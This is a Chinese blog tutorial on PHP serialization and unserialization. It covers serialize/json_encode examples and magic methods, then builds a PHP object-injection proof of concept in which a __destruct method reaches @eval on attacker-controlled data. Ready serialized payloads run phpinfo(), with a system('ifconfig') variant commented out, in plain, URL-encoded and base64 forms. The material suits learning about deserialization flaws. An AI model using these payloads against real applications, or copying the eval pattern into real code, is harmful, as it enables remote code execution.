php序列化,反序列化

原创 已于 2022-12-31 17:59:53 修改 · 637 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #开发语言

于 2022-07-20 20:35:54 首次发布

序列化

对象转换为字符串,便于存储,传输。
只要符合序列化规则的字符串,无论是否有serlallae 函数生成,都可以被反序列化。

反序列化

字符串转换为对象
序列化是没有漏洞问题,往往是反序列化时,存在漏洞。
反序列化,将字符串转化为对象。只要一个文件内有多个类,反序列化就可以使用不同类序列化后的字符串进行反序列化。
,字符串是人为可控的。所以就容易造成漏洞。

代码实现序列化反序列化


    <?php

        $student01 = array('name'=>'张三', 'age'=>30, 'addr'=>'成都高新区', 'phone'=>'18812345678');
        $student02 = array('name'=>'李中', 'age'=>30, 'addr'=>'成都高新区', 'phone'=>'18912345676');
        $student03 = array('name'=>'王九', 'age'=>25, 'addr'=>'成都高新区', 'phone'=>'19812345678');
        $student04 = array('name'=>'赵六', 'age'=>30, 'addr'=>'成都高新区', 'phone'=>'18112345679');
        $student05 = array('name'=>'周七', 'age'=>27, 'addr'=>'成都高新区', 'phone'=>'18812345978');
        $class01 = array($student01, $student02, $student03, $student04, $student05);

        print_r($class01);
        echo json_encode($class01);     // JSON序列化:将对象转换成字符串,序列化后的字符串是有一定格式的。

        // JSON反序列化:把一个字符串再转换成对象
        $string = '[{"name":"\u5f20\u4e09","age":30,"addr":"\u6210\u90fd\u9ad8\u65b0\u533a","phone":"18812345678"},{"name":"\u674e\u4e2d","age":30,"addr":"\u6210\u90fd\u9ad8\u65b0\u533a","phone":"18912345676"},{"name":"\u738b\u4e5d","age":25,"addr":"\u6210\u90fd\u9ad8\u65b0\u533a","phone":"19812345678"},{"name":"\u8d75\u516d","age":30,"addr":"\u6210\u90fd\u9ad8\u65b0\u533a","phone":"18112345679"},{"name":"\u5468\u4e03","age":27,"addr":"\u6210\u90fd\u9ad8\u65b0\u533a","phone":"18812345978"}]';
        $array = json_decode($string);
        print_r($array);
    ?>

将变量进行序列化:


<?php
header("content-type:text/html;charset=utf-8");

$name = "张三";          // 定义变量
echo serialize($name);  // 序列化后的值:s:6:"张三";
echo unserialize('s:6:"张三";');
?>

将数组进行序列化


<?php
header("content-type:text/html;charset=utf-8");

$student = array('name'=>'张三', 'age'=>30, 'addr'=>'成都高新区', 'phone'=>'18812345678');
echo serialize($student);

//输出的内容:a:4:{s:4:"name";s:6:"张三";s:3:"age";i:30;s:4:"addr";s:15:"成都高新区";s:5:"phone";s:11:"18812345678";}
?>


<?php
header("content-type:text/html;charset=utf-8");

$source = 'a:4:{s:4:"name";s:9:"张三娃";s:3:"age";i:30;s:4:"addr";s:15:"成都高新区";s:5:"phone";s:11:"18812345679";}';
$student = unserialize($source);    // 将字符串反序列化为数组
print_r($student);

//输出的内容:Array ( [name] => 张三娃 [age] => 30 [addr] => 成都高新区 [phone] => 18812345679 ) 
?>

反序列化类的过程中,会调用类的析构方法,不会调用类的构造方法。

魔术方法

魔术方法
在php中有下划线的方法是魔术方法。
魔术方法是自动调用的。

  1. __sleep():在类进行序列化时被调用,并且需要明确定义那些序列化类属性,以数组的形式定义和返回
  2. __wakeup():在类进行反序列化时被调用,可以在该方法中定义恢复类状态的代码,以便让反序列化的实例可以调用方法。
  3. __construct(): 构造方法,
  4. __destruct(): 代码运行结束时,类的实例从内存中释放时,自动调用。只要类有被实例,运行结束后都会执行__destruct。
    // 类的构造方法:当类在进行实例化时会触发执行该方法
    function __construct($host='127.0.0.1', $username='root', $password='root', $database='learn') {
        $this->host = $host;
        $this->username = $username;
        $this->password = $password;
        $this->database = $database;
        echo "调用构造方法,并建立数据库的连接 <br/>";
        $this->create_connection();     // 每一个实例化的过程,就会执行一次
    }

    // 类的析构方法:当类的实例使用完并从内存中释放时,将会触发调用该方法
    function __destruct() {
        echo "调用析构方法,并关闭数据库的连接 <br/>";
        mysqli_close($this->conn);
    }

    // 当类进行序列化时自动调用,并且返回一个数组,包含要实例化的类属性
    function __sleep() {
        echo "DB类正在进行序列化. <br/>";
        return array('host', 'username', 'password', 'database');
    }

    // 在类进行反序列时调用,并且可以在该方法中定义恢复类状态的代码,以便于让反序列化的实例可以正常调用方法。
    function __wakeup() {
        echo "DB类正在被反序列化. <br/>";
        $this->create_connection();     // 恢复数据库的连接状态
    }

反序列化时不会自动调用__construct,同时,调用完__wakeup后,仍然会调用__destruct
下图中就是对上面代码的操作,

  1. 在实例化一个DB对象时,调用构造方法
  2. 在将DB类进行序列化时,调用了__sleep() 方法。
  3. 在对source进行反序列化时,调用了__wakeup() 方法。
  4. 在所有执行完后,调用__destruct()析构方法。一个是构造方法调用的,一个是反序列化的。(因为在构造方法调用是有实例化类,在反序列化时也有 实例化类,所以关闭类需要执行两次)
    在输出反序列的结果时,如果要输出类,要使用print_r(),不能使用echo,输出类的一个属性可以使用echo,比如下面的代码
$b='O:2:"DB":4:{s:4:"host";s:9:"127.0.0.1";s:8:"username";s:4:"root";s:8:"password";s:4:"root";s:8:"database";s:4:"dvwa";}';
$a=unserialize($b);
 print_r(unserialize($b));
echo $a->host;

在这里插入图片描述
在这里插入图片描述

漏洞分析:

poc:自己手写的字符串是不太现实的,(简单的除外),但遇到复杂的,往往需要借助代码进行序列化,
创建一个文件 ustest-1.php,代码如下:

在这里插入图片描述

构造poc
在这里插入图片描述

class Woniu {
    var $a;
    function __construct() {
        $this->a = new Vul();
    }

    function __destruct() {
        $this->a->hello();
    }
}

class Test {
    function hello() {
        echo "Hello World.";
    }
}

class Vul {
    var $data = 'phpinfo();';
    function hello() {
        @eval($this->data);
    }
}

$woniu = new Woniu();
echo serialize($woniu);

运行上面的代码,执行效果如下:
在这里插入图片描述
得到poc后,在ustest-1.php中执行。
O:5:"Woniu":1:{s:1:"a";O:3:"Vul":1:{s:4:"data";s:10:"phpinfo();";}}

在这里插入图片描述

简化后的poc

class Woniu {
    var $a;
    function __construct() {
        $this->a = new Vul();
    }
}
class Vul {
    var $data = "phpinfo();";
}

要注意,这些类属性的修饰符,当为private,protected,

class Woniu {
    private $a;
    function __construct() {
        $this->a = new Vul();
    }
}
class Vul {
    protected $data = "phpinfo();";
    // protected $data = "system('ifconfig');";
}

echo serialize(new Woniu());

上面代码执行后的结果。
O:5:"Woniu":1:{s:8:"Woniua";O:3:"Vul":1:{s:7:"*data";s:10:"phpinfo();";}}
下面是修改前的结果
O:5:"Woniu":1:{s:1:"a";O:3:"Vul":1:{s:4:"data";s:10:"phpinfo();";}}

对比发现,为private修饰符的 a 在序列化后多了类的名字。

如果这个时候直接把序列化后的字符串带参数传进去,会报如下的错误。
在这里插入图片描述

class Woniu {
    private $a;
    function __construct() {
        $this->a = new Vul();
    }
}
class Vul {
    protected $data = "phpinfo();";
}
echo urlencode(serialize(new Woniu()));//将序列化后的内容进行url编码,将编码结果作为参数执行即可。

下面是url编码后的结果
oniu%22%3A1%3A%7Bs%3A8%3A%22%00Woniu%00a%22%3BO%3A3%3A%22Vul%22%3A1%3A%7Bs%3A7%3A%22%00%2A%00data%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D%7D

将编码后的结果作为参数,执行结果如下图:
在这里插入图片描述

类似的,也可以进行其他的转码,
下面是base64的转码。(url解码是默认的,不要写代码,而base64等其他编码解码的话需要用函数,例如:base64_decode()进行解码)
Tzo1OiJXb25pdSI6MTp7czo4OiIAV29uaXUAYSI7TzozOiJWdWwiOjE6e3M6NzoiACoAZGF0YSI7czoxMDoicGhwaW5mbygpOyI7fX0=
下面是解码,从中会发现为什么字符长度是8位和7位。
在这里插入图片描述
也可以直接在Firefox中查看源码:
在这里插入图片描述
我们查看url编码后的结果会发现:在上图中像四桶这个的字符其实是 %00

Zt-type
关注
【网络安全 | CTF】记一次PHP序列化反序列化解题详析
等风来
08-24 5970
代码开门见山给出backdoor函数,而该函数在popko类的call方法中调用故需要运行call方法而call方法是在对象上下文中调用不可访问的方法时触发的故需要调用不可访问的方法 而恰巧destruct方法中并不存在a对象和a函数故需要运行destruct方法而destruct方法在对象被销毁时触发 如何实现对象被销毁呢? 当序列化后的语句被反序列化之后,对象会被销毁,从而触发destruct方法 所以思路就是: 在pipimi类中构造一个对象,当pipimi中的destru
【CTF】buuctf web(三)——PHP序列化反序列化
m0_52923241的博客
08-04 2373
[极客大挑战 2019]PHP 题目类型:序列化反序列化 这儿提示备份网站,用dirsearch扫一下后台目录 输入:python dirsearch.py -u http://9b76aef7-3183-4da4-a909-0f95ad5b6607.node4.buuoj.cn -e php 找到www.zip,访问一下 跳出弹窗,点击下载 发现有flag.php目录 <?php $flag = 'Syc{dog_dog_dog_dog}'; ?> 无用信息 查看index.php
php json字符串序列化,JSON序列化反序列化实现方法(附代码)
weixin_36259438的博客
03-22 1338
这次给大家带来JSON序列化反序列化实现方法(附代码),JSON序列化反序列化实现的注意事项有哪些,下面就是实战案例,一起来看一下。一、JSON简介JSON(JavaScript Object Notation,JavaScript对象表示法)是一种轻量级的数据交换格式。JSON是“名值对”的集合。结构由大括号'{}',中括号'[]',逗号',',冒号':',双引号'“”'组成,包含的数据类型...
PHP的json_encode()函数了解
最新发布
heheoo11的博客
09-27 1181
本文对PHP的json_encode()函数进行了详细的讲解。json_encode()函数是将数组或对象转换为JSON格式字符串的核心工具,其重要性在于简化了数据在不同系统间的标准化传输,尤其在Web开发中成为前后端交互的桥梁,广泛应用于API接口开发、配置存储和跨平台数据交换场景,通过支持JSON_UNESCAPED_UNICODE等选项确保中文等特殊字符的无损处理,是现代Web服务不可或缺的基础功能。
3 ways to serialize variables in php
weixin_34112181的博客
08-01 274
序列化是将变量转换为可保存或传输的字符串的过程;反序列化就是在适当的时候把这个字符串再转化成原来的变量使用。这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。1. serialize和unserialize函数这两个是序列化反序列化PHP中数据的常用函数。 Php代码 $a=array('a'=>'Apple','b'=>...
php序列化 与json_将PHP对象序列化为JSON
weixin_33765593的博客
03-09 699
因此,当我偶然发现新的JsonSerializableInterface时,我在php.net上四处徘徊,以获取有关将PHP对象序列化为JSON的信息。它只是PHP > =5.4,而我正在5.3.x环境中运行。PHP <5.4如何实现这种功能?我还没有使用JSON进行很多工作,但是我试图在应用程序中支持API层,并且将数据对象( 否则将发送到视图 )转储到JSON中将是完美的。如果我尝...
PHP传递给js的JSON数据无法反序列化
彭世瑜的博客
06-10 1460
如果正常json序列化后无法反序列化,就进行base64编码 php编码 $data = array( "name" => "王建国", "age" => 23 ); echo json_encode($data); // {"name":"\u738b\u5efa\u56fd","age":23} echo base64_encode(json_encode($data)); // eyJuYW1lIjoiXHU3MzhiXHU1ZWZhXHU1NmZkIiwiYWdl
详解PHP序列化反序列化的方法
12-19
PHP中,序列化反序列化是两个重要的概念,它们用于在内存和持久存储(如文件、数据库)之间转换复杂的数据结构。序列化是将数据结构(如数组、对象)转换为字符串的过程,以便存储或传输;而反序列化则是将这个...
详解PHP序列化反序列化原理
10-18
首先,要理解PHP序列化反序列化的概念。序列化PHP中将对象或变量的状态信息转换成可以存储或传输的形式的过程,反序列化则是将这些存储或传输后的信息还原成PHP中可以识别的对象或变量的过程。PHP通过serialize...
php json与xml序列化/反序列化
10-26
PHP提供了`json_encode`和`json_decode`两个内置函数来处理JSON的序列化反序列化。例如: ```php $data = array( 'Name' => 'Byron', 'Age' => 24, 'Sex' => 'Male', 'Friends' => array('Casper', 'Frank', ...
编写PHP代码实现简单反序列化
weixin_58155715的博客
11-21 142
将字符串反序列化回对象。将对象序列化成字符串。当cmd=z99时,会弹出计算器。
在线php序列化解析,PHP序列化serialize
weixin_30583711的博客
03-12 2231
## PHP序列化serialize****序列化对象 - 在会话中存放对象所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。unserialize()函数能够重新把字符串变回php原来的值。 序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。为了能够unserialize()一个对象,这个对象的类必须已经定义过。如果序列化类A...
在线php序列化工具,序列化器 | Elasticsearch-PHP | Elastic
weixin_30452659的博客
03-12 6838
实现自定义序列化器edit如果你想使用自定义序列器,你需要实现 SerializerInterface 接口。请记住,对于所有的 endpoint 和连接来说,客户端只使用一个序列器对象。class MyCustomSerializer implements SerializerInterface{/*** Serialize request body** @param string|array ...
反序列化——php反序列化
qq_48829044的博客
06-20 455
php反序列化
PHP 反序列化
2301_79933084的博客
05-04 1968
O:(object)一个序列化的对象。s:(string)字符串。编写脚本,得到序列化字符串。3:类中有 3 个属性。
PHP反序列化
m0_48907714的博客
04-23 3398
PHP反序列化
PHP:json_encode序列化中文字符和json_decode反序列化object
彭世瑜的博客
03-07 609
【代码】PHP:json_encode序列化中文字符和json_decode反序列化object。
php序列化与json的用法介绍
toplover2的linux学习博客
07-08 666
首先,了解下序列化的概念。 序列化是将对象状态转换为可保持或可传输的格式的过程。与序列化相对的是反序列化,它将流转换为对象。这两个过程结合起来,可以轻松地存储和传输数据。 将对象的状态信息转换为可以存储或传输的窗体的过程。 在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。 通常,对象实例的所有字段都会被序列化
深入理解PHP反序列化机制
2. PHP序列化格式 序列化后的字符串包含了关于变量类型的元信息,每个类型都有对应的首字母缩写: - `a`: 数组 - `b`: 布尔 - `d`: 浮点数(double) - `i`: 整数 - `o`: 普通对象 - `r`: 引用 - `s`: 字符串 - `C`:...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值